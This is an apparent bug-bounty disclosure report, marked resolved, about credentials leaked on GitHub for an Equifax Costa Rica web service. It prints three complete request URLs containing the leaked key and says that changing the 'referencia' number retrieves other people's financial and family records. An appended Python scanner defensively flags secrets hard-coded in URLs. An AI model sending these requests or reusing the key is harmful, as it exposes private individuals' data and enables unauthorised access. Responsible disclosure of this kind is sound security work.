Information Leak (GitHub)
Critical
Equifax-vdp
Reported by
zifrox
Vulnerability Details
Technical details and impact analysis
On GitHub I found some credentials to use in a web service that exposes very sensitive information about people, their family group, financial situation, and more.
GitHub:
https://github.com/geraldincg/proyecto/blob/9c89787deb1d217f58b58786d90bfb3eab290237/Proyecto/ViewModels/WebService/ConexionWS.cs
The web service is a subdomain for Costa Rica:
Change the "referencia" identification number to obtain different results.
Example:
https://webservices.equifax.cr/webservices/efx_consultas.asmx/Estudio_360_Fisico?referencia=891550&Cedula=&Usuario=&Clave=EKJH1QF2IXL3FSI4APWSD5XWFGX63KLK76JFXU80RTCQWS&Usuario_Datum=
https://webservices.equifax.cr/webservices/efx_consultas.asmx/Estudio_360_Fisico?referencia=891547&Cedula=&Usuario=&Clave=EKJH1QF2IXL3FSI4APWSD5XWFGX63KLK76JFXU80RTCQWS&Usuario_Datum=
https://webservices.equifax.cr/webservices/efx_consultas.asmx/Estudio_360_Fisico?referencia=891543&Cedula=&Usuario=&Clave=EKJH1QF2IXL3FSI4APWSD5XWFGX63KLK76JFXU80RTCQWS&Usuario_Datum=
## Impact
An attacker can extract information about any person in the system.
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
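
A pre-commit style check for the leak pattern in this report, a secret hard-coded into a web-service URL in source code. This is an added example, not part of the original report; the parameter names beyond `Clave`, the length and entropy thresholds, and the sample C# snippet with its host and key are constructed assumptions.

```python
import math
import re
from collections import Counter

# "Clave" is the parameter in the report's URLs; the other names are assumptions.
SECRET_PARAMS = {"clave", "password", "passwd", "pwd", "token", "apikey", "api_key", "secret"}
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
PARAM_RE = re.compile(r"[?&]([^=&#\s]+)=([^&#\s]*)")

# Constructed C# sample (not the file from the report); host and key are made up.
SAMPLE_CS = '''
public class ConexionWS {
    private const string Url = "https://ws.example.test/consultas.asmx/Estudio?referencia=1&Usuario=&Clave=Q7ZK2M9XPLA4T8WRB3NV6HYD5CJE1SGU";
    private string Build(string clave) => "https://ws.example.test/consultas.asmx/Estudio?Clave=" + clave;
    private string Fmt = "https://ws.example.test/consultas.asmx/Estudio?Clave={0}";
}
'''

def shannon_entropy(value):
    """Bits per character; random keys score high, words and placeholders low."""
    counts = Counter(value)
    return -sum(c / len(value) * math.log2(c / len(value)) for c in counts.values())

def redact(value):
    """Keep a short prefix for triage so the finding does not re-leak the secret."""
    return value[:4] + "*" * (len(value) - 4) if len(value) > 8 else "*" * len(value)

def scan_source(text, min_len=16, min_entropy=3.5):
    """Return findings for literal secrets in URL query strings, one per parameter."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for url in URL_RE.findall(line):
            for name, value in PARAM_RE.findall(url):
                if name.lower() not in SECRET_PARAMS or not value:
                    continue  # not a secret parameter, or value supplied at runtime
                if value[0] in "{$%":
                    continue  # format/template placeholder, not a literal
                strong = len(value) >= min_len and shannon_entropy(value) >= min_entropy
                findings.append({"line": lineno, "param": name,
                                 "value": redact(value),
                                 "severity": "high" if strong else "review"})
    return findings

if __name__ == "__main__":
    for f in scan_source(SAMPLE_CS):
        print(f)
```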